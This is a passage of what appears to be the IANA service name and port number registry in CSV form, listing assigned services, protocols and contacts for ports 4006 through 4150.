pxc-spvr,4006,udp,pxc-spvr,,,,,,,, pxc-splr,4007,tcp,pxc-splr,[Dave_Nesbitt],[Dave_Nesbitt],,,,,, pxc-splr,4007,udp,pxc-splr,[Dave_Nesbitt],[Dave_Nesbitt],,,,,, netcheque,4008,tcp,NetCheque accounting,[B_Clifford_Neuman],[B_Clifford_Neuman],,,,,, netcheque,4008,udp,NetCheque accounting,[B_Clifford_Neuman],[B_Clifford_Neuman],,,,,, chimera-hwm,4009,tcp,Chimera HWM,[Ken_Anderson],[Ken_Anderson],,,,,, chimera-hwm,4009,udp,Chimera HWM,[Ken_Anderson],[Ken_Anderson],,,,,, samsung-unidex,4010,tcp,Samsung Unidex,[Konstantin_V_Vyazni],[Konstantin_V_Vyazni],,,,,, samsung-unidex,4010,udp,Samsung Unidex,[Konstantin_V_Vyazni],[Konstantin_V_Vyazni],,,,,, altserviceboot,4011,tcp,Alternate Service Boot,[Eric_Dittert],[Eric_Dittert],,,,,, altserviceboot,4011,udp,Alternate Service Boot,[Eric_Dittert],[Eric_Dittert],,,,,, pda-gate,4012,tcp,PDA Gate,[Masakuni_Okada],[Masakuni_Okada],,,,,, pda-gate,4012,udp,PDA Gate,[Masakuni_Okada],[Masakuni_Okada],,,,,, acl-manager,4013,tcp,ACL Manager,[Toru_Murai],[Toru_Murai],,,,,, acl-manager,4013,udp,ACL Manager,[Toru_Murai],[Toru_Murai],,,,,, taiclock,4014,tcp,TAICLOCK,[Dan_Bernstein_3],[Dan_Bernstein_3],,,,,, taiclock,4014,udp,TAICLOCK,[Dan_Bernstein_3],[Dan_Bernstein_3],,,,,, talarian-mcast1,4015,tcp,Talarian Mcast,,,,,,,, talarian-mcast1,4015,udp,Talarian Mcast,,,,,,,, talarian-mcast2,4016,tcp,Talarian Mcast,,,,,,,, talarian-mcast2,4016,udp,Talarian Mcast,,,,,,,, talarian-mcast3,4017,tcp,Talarian Mcast,,,,,,,, talarian-mcast3,4017,udp,Talarian Mcast,,,,,,,, talarian-mcast4,4018,tcp,Talarian Mcast,,,,,,,, talarian-mcast4,4018,udp,Talarian Mcast,,,,,,,, talarian-mcast5,4019,tcp,Talarian Mcast,[Geoff_Mendal],[Geoff_Mendal],,,,,, talarian-mcast5,4019,udp,Talarian Mcast,[Geoff_Mendal],[Geoff_Mendal],,,,,, trap,4020,tcp,TRAP Port,[Jeffrey_C_Byrd],[Jeffrey_C_Byrd],,,,,, trap,4020,udp,TRAP Port,[Jeffrey_C_Byrd],[Jeffrey_C_Byrd],,,,,, nexus-portal,4021,tcp,Nexus Portal,[Damian_Tarnawsky],[Damian_Tarnawsky],,,,,, nexus-portal,4021,udp,Nexus Portal,[Damian_Tarnawsky],[Damian_Tarnawsky],,,,,, dnox,4022,tcp,DNOX,[Leo_Rathnayake],[Leo_Rathnayake],,,,,, dnox,4022,udp,DNOX,[Leo_Rathnayake],[Leo_Rathnayake],,,,,, esnm-zoning,4023,tcp,ESNM Zoning Port,[Yong_Cai],[Yong_Cai],,,,,, esnm-zoning,4023,udp,ESNM Zoning Port,[Yong_Cai],[Yong_Cai],,,,,, tnp1-port,4024,tcp,TNP1 User Port,[Tony_Gibbs],[Tony_Gibbs],,,,,, tnp1-port,4024,udp,TNP1 User Port,[Tony_Gibbs],[Tony_Gibbs],,,,,, partimage,4025,tcp,Partition Image Port,[Franck_Ladurelle],[Franck_Ladurelle],,,,,, partimage,4025,udp,Partition Image Port,[Franck_Ladurelle],[Franck_Ladurelle],,,,,, as-debug,4026,tcp,Graphical Debug Server,[Steve_Halverson],[Steve_Halverson],,,,,, as-debug,4026,udp,Graphical Debug Server,[Steve_Halverson],[Steve_Halverson],,,,,, bxp,4027,tcp,bitxpress,[Morgan_Doyle],[Morgan_Doyle],,,,,, bxp,4027,udp,bitxpress,[Morgan_Doyle],[Morgan_Doyle],,,,,, dtserver-port,4028,tcp,DTServer Port,[Stephen_Aikins],[Stephen_Aikins],,,,,, dtserver-port,4028,udp,DTServer Port,[Stephen_Aikins],[Stephen_Aikins],,,,,, ip-qsig,4029,tcp,IP Q signaling protocol,[Toru_Tachibana],[Toru_Tachibana],,,,,, ip-qsig,4029,udp,IP Q signaling protocol,[Toru_Tachibana],[Toru_Tachibana],,,,,, jdmn-port,4030,tcp,Accell/JSP Daemon Port,[Daegis_Inc],[Chris_Anderson],,2012-07-12,,,, jdmn-port,4030,udp,Accell/JSP Daemon Port,[Daegis_Inc],[Chris_Anderson],,2012-07-12,,,, suucp,4031,tcp,UUCP over SSL,[Harald_Welte],[Harald_Welte],,,,,, suucp,4031,udp,UUCP over SSL,[Harald_Welte],[Harald_Welte],,,,,, vrts-auth-port,4032,tcp,VERITAS Authorization Service,[Stefan_Winkel],[Stefan_Winkel],,,,,, vrts-auth-port,4032,udp,VERITAS Authorization Service,[Stefan_Winkel],[Stefan_Winkel],,,,,, sanavigator,4033,tcp,SANavigator Peer Port,[Robert_J_Chansler],[Robert_J_Chansler],,,,,, sanavigator,4033,udp,SANavigator Peer Port,[Robert_J_Chansler],[Robert_J_Chansler],,,,,, ubxd,4034,tcp,Ubiquinox Daemon,[Kit_Smithers],[Kit_Smithers],,,,,, ubxd,4034,udp,Ubiquinox Daemon,[Kit_Smithers],[Kit_Smithers],,,,,, wap-push-http,4035,tcp,WAP Push OTA-HTTP port,,,,,,,, wap-push-http,4035,udp,WAP Push OTA-HTTP port,,,,,,,, wap-push-https,4036,tcp,WAP Push OTA-HTTP secure,[Matthieu_Lachance],[Matthieu_Lachance],,,,,, wap-push-https,4036,udp,WAP Push OTA-HTTP secure,[Matthieu_Lachance],[Matthieu_Lachance],,,,,, ravehd,4037,tcp,RaveHD network control,[Jason_Howard],[Jason_Howard],2006-01,,,,, ravehd,4037,udp,RaveHD network control,[Jason_Howard],[Jason_Howard],2006-01,,,,, fazzt-ptp,4038,tcp,Fazzt Point-To-Point,,,,,,,, fazzt-ptp,4038,udp,Fazzt Point-To-Point,,,,,,,, fazzt-admin,4039,tcp,Fazzt Administration,[Lewis_Wolfgang],[Lewis_Wolfgang],2006-05,,,,, fazzt-admin,4039,udp,Fazzt Administration,[Lewis_Wolfgang],[Lewis_Wolfgang],2006-05,,,,, yo-main,4040,tcp,Yo.net main service,[John_Tintor],[John_Tintor],,,,,, yo-main,4040,udp,Yo.net main service,[John_Tintor],[John_Tintor],,,,,, houston,4041,tcp,Rocketeer-Houston,[Johnny_C_Norris_II],[Johnny_C_Norris_II],,,,,, houston,4041,udp,Rocketeer-Houston,[Johnny_C_Norris_II],[Johnny_C_Norris_II],,,,,, ldxp,4042,tcp,LDXP,[Craig_Calef],[Craig_Calef],,,,,, ldxp,4042,udp,LDXP,[Craig_Calef],[Craig_Calef],,,,,, nirp,4043,tcp,Neighbour Identity Resolution,,,,,,,, nirp,4043,udp,Neighbour Identity Resolution,,,,,,,, ltp,4044,tcp,Location Tracking Protocol,,,,,,,, ltp,4044,udp,Location Tracking Protocol,,,,,,,, npp,4045,tcp,Network Paging Protocol,,,,,,,Known UNAUTHORIZED USE: Port 4045, npp,4045,udp,Network Paging Protocol,,,,,,,Known UNAUTHORIZED USE: Port 4045, acp-proto,4046,tcp,Accounting Protocol,,,,,,,, acp-proto,4046,udp,Accounting Protocol,,,,,,,, ctp-state,4047,tcp,Context Transfer Protocol,[Hesham_Soliman],[Hesham_Soliman],2005-11,,,,, ctp-state,4047,udp,Context Transfer Protocol,[Hesham_Soliman],[Hesham_Soliman],2005-11,,,,, ,4048,,Unassigned,,,,2008-04-24,,,, wafs,4049,tcp,Wide Area File Services,[Yuval_Hager],[Yuval_Hager],2006-01,,,,, wafs,4049,udp,Wide Area File Services,[Yuval_Hager],[Yuval_Hager],2006-01,,,,, cisco-wafs,4050,tcp,Wide Area File Services,[Etai_Lev_Ran],[Etai_Lev_Ran],2005-02,,,,, cisco-wafs,4050,udp,Wide Area File Services,[Etai_Lev_Ran],[Etai_Lev_Ran],2005-02,,,,, cppdp,4051,tcp,Cisco Peer to Peer Distribution Protocol,[Susan_Sauter],[Susan_Sauter],2006-07,,,,, cppdp,4051,udp,Cisco Peer to Peer Distribution Protocol,[Susan_Sauter],[Susan_Sauter],2006-07,,,,, interact,4052,tcp,VoiceConnect Interact,[Jonathan_Custance],[Jonathan_Custance],2006-07,,,,, interact,4052,udp,VoiceConnect Interact,[Jonathan_Custance],[Jonathan_Custance],2006-07,,,,, ccu-comm-1,4053,tcp,CosmoCall Universe Communications Port 1,,,,,,,, ccu-comm-1,4053,udp,CosmoCall Universe Communications Port 1,,,,,,,, ccu-comm-2,4054,tcp,CosmoCall Universe Communications Port 2,,,,,,,, ccu-comm-2,4054,udp,CosmoCall Universe Communications Port 2,,,,,,,, ccu-comm-3,4055,tcp,CosmoCall Universe Communications Port 3,[Steve_Dellutri_2],[Steve_Dellutri_2],2006-07,,,,, ccu-comm-3,4055,udp,CosmoCall Universe Communications Port 3,[Steve_Dellutri_2],[Steve_Dellutri_2],2006-07,,,,, lms,4056,tcp,Location Message Service,[Sergey_Burnevsky],[Sergey_Burnevsky],2006-08,,,,, lms,4056,udp,Location Message Service,[Sergey_Burnevsky],[Sergey_Burnevsky],2006-08,,,,, wfm,4057,tcp,Servigistics WFM server,[Yuri_Machkasov_2],[Yuri_Machkasov_2],2006-08,,,,, wfm,4057,udp,Servigistics WFM server,[Yuri_Machkasov_2],[Yuri_Machkasov_2],2006-08,,,,, kingfisher,4058,tcp,Kingfisher protocol,[Vaughan_Wesson],[Vaughan_Wesson],2006-10,,,,, kingfisher,4058,udp,Kingfisher protocol,[Vaughan_Wesson],[Vaughan_Wesson],2006-10,,,,, dlms-cosem,4059,tcp,DLMS/COSEM,[Gyozo_Kmethy],[Gyozo_Kmethy],2006-11,,,,, dlms-cosem,4059,udp,DLMS/COSEM,[Gyozo_Kmethy],[Gyozo_Kmethy],2006-11,,,,, dsmeter-iatc,4060,tcp,"DSMETER Inter-Agent Transfer Channel IANA assigned this well-formed service name as a replacement for ""dsmeter_iatc"".",[John_McCann],[John_McCann],2006-12,,,,, dsmeter_iatc,4060,tcp,DSMETER Inter-Agent Transfer Channel,[John_McCann],[John_McCann],2006-12,,,,,"This entry is an alias to ""dsmeter-iatc"". This entry is now historic, not usable for use with many common service discovery mechanisms." dsmeter-iatc,4060,udp,"DSMETER Inter-Agent Transfer Channel IANA assigned this well-formed service name as a replacement for ""dsmeter_iatc"".",[John_McCann],[John_McCann],2006-12,,,,, dsmeter_iatc,4060,udp,DSMETER Inter-Agent Transfer Channel,[John_McCann],[John_McCann],2006-12,,,,,"This entry is an alias to ""dsmeter-iatc"". This entry is now historic, not usable for use with many common service discovery mechanisms." ice-location,4061,tcp,Ice Location Service (TCP),,,,,,,, ice-location,4061,udp,Ice Location Service (TCP),,,,,,,, ice-slocation,4062,tcp,Ice Location Service (SSL),,,,,,,, ice-slocation,4062,udp,Ice Location Service (SSL),,,,,,,, ice-router,4063,tcp,Ice Firewall Traversal Service (TCP),,,,,,,, ice-router,4063,udp,Ice Firewall Traversal Service (TCP),,,,,,,, ice-srouter,4064,tcp,Ice Firewall Traversal Service (SSL),[Bernard_Normier],[Bernard_Normier],2006-12,,,,, ice-srouter,4064,udp,Ice Firewall Traversal Service (SSL),[Bernard_Normier],[Bernard_Normier],2006-12,,,,, avanti-cdp,4065,tcp,"Avanti Common Data IANA assigned this well-formed service name as a replacement for ""avanti_cdp"".",[Steve_Meyer_Sr],[Steve_Meyer_Sr],2007-02,,,,, avanti_cdp,4065,tcp,Avanti Common Data,[Steve_Meyer_Sr],[Steve_Meyer_Sr],2007-02,,,,,"This entry is an alias to ""avanti-cdp"". This entry is now historic, not usable for use with many common service discovery mechanisms." avanti-cdp,4065,udp,"Avanti Common Data IANA assigned this well-formed service name as a replacement for ""avanti_cdp"".",[Steve_Meyer_Sr],[Steve_Meyer_Sr],2007-02,,,,, avanti_cdp,4065,udp,Avanti Common Data,[Steve_Meyer_Sr],[Steve_Meyer_Sr],2007-02,,,,,"This entry is an alias to ""avanti-cdp"". This entry is now historic, not usable for use with many common service discovery mechanisms." pmas,4066,tcp,Performance Measurement and Analysis,[Zenon_Fortuna],[Zenon_Fortuna],2007-02,,,,, pmas,4066,udp,Performance Measurement and Analysis,[Zenon_Fortuna],[Zenon_Fortuna],2007-02,,,,, idp,4067,tcp,Information Distribution Protocol,[Michaela_Vanderveen],[Michaela_Vanderveen],2007-02,,,,, idp,4067,udp,Information Distribution Protocol,[Michaela_Vanderveen],[Michaela_Vanderveen],2007-02,,,,, ipfltbcst,4068,tcp,IP Fleet Broadcast,[Trung_Huu_Tran],[Trung_Huu_Tran],2007-03,,,,, ipfltbcst,4068,udp,IP Fleet Broadcast,[Trung_Huu_Tran],[Trung_Huu_Tran],2007-03,,,,, minger,4069,tcp,Minger Email Address Validation Service,[Arvel_Hathcock],[Arvel_Hathcock],2007-03,,,,, minger,4069,udp,Minger Email Address Validation Service,[Arvel_Hathcock],[Arvel_Hathcock],2007-03,,,,, tripe,4070,tcp,Trivial IP Encryption (TrIPE),[Mark_Wooding],[Mark_Wooding],2007-07-10,,,,, tripe,4070,udp,Trivial IP Encryption (TrIPE),[Mark_Wooding],[Mark_Wooding],2007-07-10,,,,, aibkup,4071,tcp,Automatically Incremental Backup,[Volker_Wiegand],[Volker_Wiegand],2007-07-10,,,,, aibkup,4071,udp,Automatically Incremental Backup,[Volker_Wiegand],[Volker_Wiegand],2007-07-10,,,,, zieto-sock,4072,tcp,Zieto Socket Communications,[Malcolm_McLean],[Malcolm_McLean],2007-07-19,,,,, zieto-sock,4072,udp,Zieto Socket Communications,[Malcolm_McLean],[Malcolm_McLean],2007-07-19,,,,, iRAPP,4073,tcp,iRAPP Server Protocol,[Vladimir_Bickov],[Vladimir_Bickov],2007-08-20,,,,, iRAPP,4073,udp,iRAPP Server Protocol,[Vladimir_Bickov],[Vladimir_Bickov],2007-08-20,,,,, cequint-cityid,4074,tcp,Cequint City ID UI trigger,[Phill_Goeckler],[Phill_Goeckler],2007-08-20,,,,, cequint-cityid,4074,udp,Cequint City ID UI trigger,[Phill_Goeckler],[Phill_Goeckler],2007-08-20,,,,, perimlan,4075,tcp,ISC Alarm Message Service,[Bernie_Malkowski],[Bernie_Malkowski],2007-08-20,,,,, perimlan,4075,udp,ISC Alarm Message Service,[Bernie_Malkowski],[Bernie_Malkowski],2007-08-20,,,,, seraph,4076,tcp,Seraph DCS,[Jason_Spence],[Jason_Spence],2008-01-22,,,,, seraph,4076,udp,Seraph DCS,[Jason_Spence],[Jason_Spence],2008-01-22,,,,, ,4077,tcp,Reserved,,,,,,,, ascomalarm,4077,udp,Ascom IP Alarming,[Ascom_Austria_GmbH],[Ascom_Austria_GmbH],2008-05-01,,,,, cssp,4078,tcp,Coordinated Security Service Protocol,[Michael_McDaniels],[Michael_McDaniels],2008-05-01,,,,, ,4078,udp,Reserved,,,,,,,, santools,4079,tcp,SANtools Diagnostic Server,[David_A_Lethe_2],[David_A_Lethe_2],2008-05-01,,,,, santools,4079,udp,SANtools Diagnostic Server,[David_A_Lethe_2],[David_A_Lethe_2],2008-05-01,,,,, lorica-in,4080,tcp,Lorica inside facing,,,,,,,, lorica-in,4080,udp,Lorica inside facing,,,,,,,, lorica-in-sec,4081,tcp,Lorica inside facing (SSL),,,,,,,, lorica-in-sec,4081,udp,Lorica inside facing (SSL),,,,,,,, lorica-out,4082,tcp,Lorica outside facing,,,,,,,, lorica-out,4082,udp,Lorica outside facing,,,,,,,, lorica-out-sec,4083,tcp,Lorica outside facing (SSL),[Johannes_Skov_Frands],[Johannes_Skov_Frands],2008-02-28,,,,, lorica-out-sec,4083,udp,Lorica outside facing (SSL),[Johannes_Skov_Frands],[Johannes_Skov_Frands],2008-02-28,,,,, ,4084,tcp,Reserved,,,,,,,, fortisphere-vm,4084,udp,Fortisphere VM Service,[Daniel_Becker_4],[Daniel_Becker_4],2008-06-03,,,,, ezmessagesrv,4085,tcp,EZNews Newsroom Message Service,[Gerald_R_Jensen],[Gerald_R_Jensen],2008-06-05,,,,, ,4085,udp,Reserved,,,,,,,, ,4086,tcp,Reserved,,,,,,,, ftsync,4086,udp,Firewall/NAT state table synchronization,[Heiner_Erne],[Heiner_Erne],2008-06-06,,,,, applusservice,4087,tcp,APplus Service,[Thomas_Boerkel],[Thomas_Boerkel],2008-06-05,,,,, ,4087,udp,Reserved,,,,,,,, npsp,4088,tcp,Noah Printing Service Protocol,[Hiromi_Ohara],[Hiromi_Ohara],2008-06-18,,,,, ,4088,udp,Reserved,,,,,,,, opencore,4089,tcp,OpenCORE Remote Control Service,[Pim_van_Riezen],[Pim_van_Riezen],2006-07,,,,, opencore,4089,udp,OpenCORE Remote Control Service,[Pim_van_Riezen],[Pim_van_Riezen],2006-07,,,,, omasgport,4090,tcp,OMA BCAST Service Guide,[Mark_Lipford],[Mark_Lipford],2006-07,,,,, omasgport,4090,udp,OMA BCAST Service Guide,[Mark_Lipford],[Mark_Lipford],2006-07,,,,, ewinstaller,4091,tcp,EminentWare Installer,,,,,,,, ewinstaller,4091,udp,EminentWare Installer,,,,,,,, ewdgs,4092,tcp,EminentWare DGS,[David_A_Gayler_2],[David_A_Gayler_2],2006-07,,,,, ewdgs,4092,udp,EminentWare DGS,[David_A_Gayler_2],[David_A_Gayler_2],2006-07,,,,, pvxpluscs,4093,tcp,Pvx Plus CS Host,[Michael_King],[Michael_King],2006-07,,,,, pvxpluscs,4093,udp,Pvx Plus CS Host,[Michael_King],[Michael_King],2006-07,,,,, sysrqd,4094,tcp,sysrq daemon,[Julien_Danjou],[Julien_Danjou],2006-07,,,,, sysrqd,4094,udp,sysrq daemon,[Julien_Danjou],[Julien_Danjou],2006-07,,,,, xtgui,4095,tcp,xtgui information service,[Jim_Robanske],[Jim_Robanske],2006-05,,,,, xtgui,4095,udp,xtgui information service,[Jim_Robanske],[Jim_Robanske],2006-05,,,,, bre,4096,tcp,BRE (Bridge Relay Element),[Stephen_Egbert],[Stephen_Egbert],,,,,, bre,4096,udp,BRE (Bridge Relay Element),[Stephen_Egbert],[Stephen_Egbert],,,,,, patrolview,4097,tcp,Patrol View,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, patrolview,4097,udp,Patrol View,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, drmsfsd,4098,tcp,drmsfsd,[Masao_Iwai],[Masao_Iwai],,,,,, drmsfsd,4098,udp,drmsfsd,[Masao_Iwai],[Masao_Iwai],,,,,, dpcp,4099,tcp,DPCP,[John_Croft],[John_Croft],,,,,, dpcp,4099,udp,DPCP,[John_Croft],[John_Croft],,,,,, igo-incognito,4100,tcp,IGo Incognito Data Port,[Paul_Reddy_2],[Paul_Reddy_2],2002-02,,,,, igo-incognito,4100,udp,IGo Incognito Data Port,[Paul_Reddy_2],[Paul_Reddy_2],2002-02,,,,, brlp-0,4101,tcp,Braille protocol,,,,,,,, brlp-0,4101,udp,Braille protocol,,,,,,,, brlp-1,4102,tcp,Braille protocol,,,,,,,, brlp-1,4102,udp,Braille protocol,,,,,,,, brlp-2,4103,tcp,Braille protocol,,,,,,,, brlp-2,4103,udp,Braille protocol,,,,,,,, brlp-3,4104,tcp,Braille protocol,[Sebastien_Hinderer],[Sebastien_Hinderer],2006-03,,,,, brlp-3,4104,udp,Braille protocol,[Sebastien_Hinderer],[Sebastien_Hinderer],2006-03,,,,, shofar,4105,tcp,Shofar,[ShofarNexus],[John_Kozlowski],2006-07,2012-02-20,,,, shofar,4105,udp,Shofar,[ShofarNexus],[John_Kozlowski],2006-07,2012-02-20,,,, synchronite,4106,tcp,Synchronite,[James_Figgins],[James_Figgins],2006-07,,,,, synchronite,4106,udp,Synchronite,[James_Figgins],[James_Figgins],2006-07,,,,, j-ac,4107,tcp,JDL Accounting LAN Service,[Takashi_Sahara],[Takashi_Sahara],2006-09,,,,, j-ac,4107,udp,JDL Accounting LAN Service,[Takashi_Sahara],[Takashi_Sahara],2006-09,,,,, accel,4108,tcp,ACCEL,[Masahiro_Koiwai],[Masahiro_Koiwai],2006-10,,,,, accel,4108,udp,ACCEL,[Masahiro_Koiwai],[Masahiro_Koiwai],2006-10,,,,, izm,4109,tcp,Instantiated Zero-control Messaging,[David_Miller],[David_Miller],2007-02,,,,, izm,4109,udp,Instantiated Zero-control Messaging,[David_Miller],[David_Miller],2007-02,,,,, g2tag,4110,tcp,G2 RFID Tag Telemetry Data,[David_Goodall],[David_Goodall],2007-02,,,,, g2tag,4110,udp,G2 RFID Tag Telemetry Data,[David_Goodall],[David_Goodall],2007-02,,,,, xgrid,4111,tcp,Xgrid,[David_Kramer],[David_Kramer],2004-11,,,,, xgrid,4111,udp,Xgrid,[David_Kramer],[David_Kramer],2004-11,,,,, apple-vpns-rp,4112,tcp,Apple VPN Server Reporting Protocol,[Christophe_Allie],[Christophe_Allie],2006-08,,,,, apple-vpns-rp,4112,udp,Apple VPN Server Reporting Protocol,[Christophe_Allie],[Christophe_Allie],2006-08,,,,, aipn-reg,4113,tcp,AIPN LS Registration,[Qiang_Zhang_2],[Qiang_Zhang_2],2006-10,,,,, aipn-reg,4113,udp,AIPN LS Registration,[Qiang_Zhang_2],[Qiang_Zhang_2],2006-10,,,,, jomamqmonitor,4114,tcp,JomaMQMonitor,[Marcel_Hofstetter],[Marcel_Hofstetter],2003-01,,,,, jomamqmonitor,4114,udp,JomaMQMonitor,[Marcel_Hofstetter],[Marcel_Hofstetter],2003-01,,,,, cds,4115,tcp,CDS Transfer Agent,[Neil_Coggins],[Neil_Coggins],2006-07,,,,, cds,4115,udp,CDS Transfer Agent,[Neil_Coggins],[Neil_Coggins],2006-07,,,,, smartcard-tls,4116,tcp,smartcard-TLS,[Ilan_Mahalal],[Ilan_Mahalal],2006-04,,,,, smartcard-tls,4116,udp,smartcard-TLS,[Ilan_Mahalal],[Ilan_Mahalal],2006-04,,,,, hillrserv,4117,tcp,Hillr Connection Manager,[Freddy_A_Ayuso_Hens],[Freddy_A_Ayuso_Hens],2008-05-22,,,,, hillrserv,4117,udp,Hillr Connection Manager,[Freddy_A_Ayuso_Hens],[Freddy_A_Ayuso_Hens],2008-05-22,,,,, netscript,4118,tcp,Netadmin Systems NETscript service,[Goran_Runfeldt],[Goran_Runfeldt],2006-12,,,,, netscript,4118,udp,Netadmin Systems NETscript service,[Goran_Runfeldt],[Goran_Runfeldt],2006-12,,,,, assuria-slm,4119,tcp,Assuria Log Manager,[Nick_Connor],[Nick_Connor],2006-12,,,,, assuria-slm,4119,udp,Assuria Log Manager,[Nick_Connor],[Nick_Connor],2006-12,,,,, ,4120,,Unassigned,,,,2007-02-01,,,, e-builder,4121,tcp,e-Builder Application Communication,[James_Caza],[James_Caza],2006-12,,,,, e-builder,4121,udp,e-Builder Application Communication,[James_Caza],[James_Caza],2006-12,,,,, fprams,4122,tcp,Fiber Patrol Alarm Service,[Zhizhong_Zhuang],[Zhizhong_Zhuang],2006-12,,,,, fprams,4122,udp,Fiber Patrol Alarm Service,[Zhizhong_Zhuang],[Zhizhong_Zhuang],2006-12,,,,, z-wave,4123,tcp,Z-Wave Protocol,[Sigma_Designs_Inc_2],[Anders_Brandt][Mary_Miller],2007-02,2012-11-08,,,, z-wave,4123,udp,Z-Wave Protocol,[Sigma_Designs_Inc_2],[Anders_Brandt][Mary_Miller],2007-02,2012-11-08,,,, tigv2,4124,tcp,Rohill TetraNode Ip Gateway v2,[Bert_Bouwers],[Bert_Bouwers],2007-05,,,,, tigv2,4124,udp,Rohill TetraNode Ip Gateway v2,[Bert_Bouwers],[Bert_Bouwers],2007-05,,,,, opsview-envoy,4125,tcp,Opsview Envoy,[Ton_Voon],[Ton_Voon],2008-09-26,,,,, opsview-envoy,4125,udp,Opsview Envoy,[Ton_Voon],[Ton_Voon],2008-09-26,,,,, ddrepl,4126,tcp,Data Domain Replication Service,[Pratik_Wadher],[Pratik_Wadher],2007-05,,,,, ddrepl,4126,udp,Data Domain Replication Service,[Pratik_Wadher],[Pratik_Wadher],2007-05,,,,, unikeypro,4127,tcp,NetUniKeyServer,[Raymond_Chaw],[Raymond_Chaw],2007-05,,,,, unikeypro,4127,udp,NetUniKeyServer,[Raymond_Chaw],[Raymond_Chaw],2007-05,,,,, nufw,4128,tcp,NuFW decision delegation protocol,,,,,,,, nufw,4128,udp,NuFW decision delegation protocol,,,,,,,, nuauth,4129,tcp,NuFW authentication protocol,[Eric_Leblond],[Eric_Leblond],2007-06,,,,, nuauth,4129,udp,NuFW authentication protocol,[Eric_Leblond],[Eric_Leblond],2007-06,,,,, fronet,4130,tcp,FRONET message protocol,[Christer_Nygren],[Christer_Nygren],2007-08-07,,,,, fronet,4130,udp,FRONET message protocol,[Christer_Nygren],[Christer_Nygren],2007-08-07,,,,, stars,4131,tcp,Global Maintech Stars,[Harry_Goldschmitt_2],[Harry_Goldschmitt_2],2007-06,,,,, stars,4131,udp,Global Maintech Stars,[Harry_Goldschmitt_2],[Harry_Goldschmitt_2],2007-06,,,,, nuts-dem,4132,tcp,"NUTS Daemon IANA assigned this well-formed service name as a replacement for ""nuts_dem"".",,,,,,,, nuts_dem,4132,tcp,NUTS Daemon,,,,,,,,"This entry is an alias to ""nuts-dem"". This entry is now historic, not usable for use with many common service discovery mechanisms." nuts-dem,4132,udp,"NUTS Daemon IANA assigned this well-formed service name as a replacement for ""nuts_dem"".",,,,,,,, nuts_dem,4132,udp,NUTS Daemon,,,,,,,,"This entry is an alias to ""nuts-dem"". This entry is now historic, not usable for use with many common service discovery mechanisms." nuts-bootp,4133,tcp,"NUTS Bootp Server IANA assigned this well-formed service name as a replacement for ""nuts_bootp"".",[Martin_Freiss_2],[Martin_Freiss_2],,,,,, nuts_bootp,4133,tcp,NUTS Bootp Server,[Martin_Freiss_2],[Martin_Freiss_2],,,,,,"This entry is an alias to ""nuts-bootp"". This entry is now historic, not usable for use with many common service discovery mechanisms." nuts-bootp,4133,udp,"NUTS Bootp Server IANA assigned this well-formed service name as a replacement for ""nuts_bootp"".",[Martin_Freiss_2],[Martin_Freiss_2],,,,,, nuts_bootp,4133,udp,NUTS Bootp Server,[Martin_Freiss_2],[Martin_Freiss_2],,,,,,"This entry is an alias to ""nuts-bootp"". This entry is now historic, not usable for use with many common service discovery mechanisms." nifty-hmi,4134,tcp,NIFTY-Serve HMI protocol,[Ryuichi_Suzuki],[Ryuichi_Suzuki],,,,,, nifty-hmi,4134,udp,NIFTY-Serve HMI protocol,[Ryuichi_Suzuki],[Ryuichi_Suzuki],,,,,, cl-db-attach,4135,tcp,Classic Line Database Server Attach,,,,,,,, cl-db-attach,4135,udp,Classic Line Database Server Attach,,,,,,,, cl-db-request,4136,tcp,Classic Line Database Server Request,,,,,,,, cl-db-request,4136,udp,Classic Line Database Server Request,,,,,,,, cl-db-remote,4137,tcp,Classic Line Database Server Remote,[Arno_Kirmeir],[Arno_Kirmeir],2007-01,,,,, cl-db-remote,4137,udp,Classic Line Database Server Remote,[Arno_Kirmeir],[Arno_Kirmeir],2007-01,,,,, nettest,4138,tcp,nettest,[David_Borman],[David_Borman],2003-03,,,,, nettest,4138,udp,nettest,[David_Borman],[David_Borman],2003-03,,,,, thrtx,4139,tcp,Imperfect Networks Server,[Dinkar_Chivaluri_2],[Dinkar_Chivaluri_2],2006-02,,,,, thrtx,4139,udp,Imperfect Networks Server,[Dinkar_Chivaluri_2],[Dinkar_Chivaluri_2],2006-02,,,,, cedros-fds,4140,tcp,"Cedros Fraud Detection System IANA assigned this well-formed service name as a replacement for ""cedros_fds"".",[Markus_Michels_3],[Markus_Michels_3],2006-10,,,,, cedros_fds,4140,tcp,Cedros Fraud Detection System,[Markus_Michels_3],[Markus_Michels_3],2006-10,,,,,"This entry is an alias to ""cedros-fds"". This entry is now historic, not usable for use with many common service discovery mechanisms." cedros-fds,4140,udp,"Cedros Fraud Detection System IANA assigned this well-formed service name as a replacement for ""cedros_fds"".",[Markus_Michels_3],[Markus_Michels_3],2006-10,,,,, cedros_fds,4140,udp,Cedros Fraud Detection System,[Markus_Michels_3],[Markus_Michels_3],2006-10,,,,,"This entry is an alias to ""cedros-fds"". This entry is now historic, not usable for use with many common service discovery mechanisms." oirtgsvc,4141,tcp,Workflow Server,,,,,,,, oirtgsvc,4141,udp,Workflow Server,,,,,,,, oidocsvc,4142,tcp,Document Server,,,,,,,, oidocsvc,4142,udp,Document Server,,,,,,,, oidsr,4143,tcp,Document Replication,[Norman_Brie],[Norman_Brie],,,,,, oidsr,4143,udp,Document Replication,[Norman_Brie],[Norman_Brie],,,,,, ,4144,,Unassigned,,,,,,,,Compuserve (unoffically) is using port 4144 vvr-control,4145,tcp,VVR Control,[Ming_Xu],[Ming_Xu],,,,,, vvr-control,4145,udp,VVR Control,[Ming_Xu],[Ming_Xu],,,,,, tgcconnect,4146,tcp,TGCConnect Beacon,[Brian_Becker],[Brian_Becker],2006-10,,,,, tgcconnect,4146,udp,TGCConnect Beacon,[Brian_Becker],[Brian_Becker],2006-10,,,,, vrxpservman,4147,tcp,Multum Service Manager,[Scott_Mager],[Scott_Mager],2006-10,,,,, vrxpservman,4147,udp,Multum Service Manager,[Scott_Mager],[Scott_Mager],2006-10,,,,, hhb-handheld,4148,tcp,HHB Handheld Client,[Steven_G_Loughner],[Steven_G_Loughner],2007-03,,,,, hhb-handheld,4148,udp,HHB Handheld Client,[Steven_G_Loughner],[Steven_G_Loughner],2007-03,,,,, agslb,4149,tcp,A10 GSLB Service,[John_Chiong],[John_Chiong],2007-07-02,,,,, agslb,4149,udp,A10 GSLB Service,[John_Chiong],[John_Chiong],2007-07-02,,,,, PowerAlert-nsa,4150,tcp,PowerAlert Network Shutdown Agent,[Mike_Delgrosso_2],[Mike_Delgrosso_2],2007-07-02,,,,, 